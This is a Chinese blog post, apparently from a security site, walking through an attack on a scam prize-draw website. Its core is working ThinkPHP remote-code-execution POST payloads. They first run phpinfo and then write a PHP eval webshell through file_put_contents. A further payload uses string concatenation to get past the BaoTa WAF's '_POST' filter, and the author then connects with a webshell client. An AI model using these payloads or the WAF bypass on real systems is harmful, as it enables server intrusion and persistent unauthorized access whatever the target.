大横幅1
大横幅2
到期时间:永久 到期时间:推广
小横幅3 小横幅4
  1. 当前位置:网站首页 > 技术教程

抽奖诈骗网站的渗透


网站是这样的,他是利用短视频发布免费皮肤领取的视频,扫码进入这个网页,然后扫码进群再进行诈骗。

报错判断为think PHP框架

试试RCE

POST:

http://xxxx.xxxx.com/?s=index/index/

s=-1&_method=__construct&method=get&filter[]=phpinfo

为php5,尝试写shell

POST

http://xxx.xxx.com/?s=index/index

s=file_put_contents('1.php','<?php eval($_POST[x])?>')&_method=__construct&method=POST&filter[]=assert

宝塔waf

经过多次实验,宝塔应该是拦截了_POST[关键字,下面我们尝试绕过

在php里面我们可以使用'.'拼接符来连接前后的语句

<?php ev'.'al($_PO'.'ST[x])?>相当于<?php eval($_POST[x])?>

POST:

http://xxx.xxx.com/?s=index/index

s=file_put_contents('1.php','<?php ev'.'al($_PO'.'ST[x])?>')&_method=__construct&method=POST&filter[]=assert

写shell成功

访问http://xxx.xx/1.php

菜刀连接成功

宝塔限制的太死了,提权不了


本文最后更新于2022-11-21,已超过 3个月没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!
获取更多资讯请加入交流群

    协助本站SEO优化一下,谢谢!
    关键词不能为空
版权说明

本文地址:http://www.kirinbk.cn/post-738.html
免责声明:本站文章仅用于科普及教育用途,远离犯罪!

发表评论

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:8:00-23:00,节假日休息

扫码关注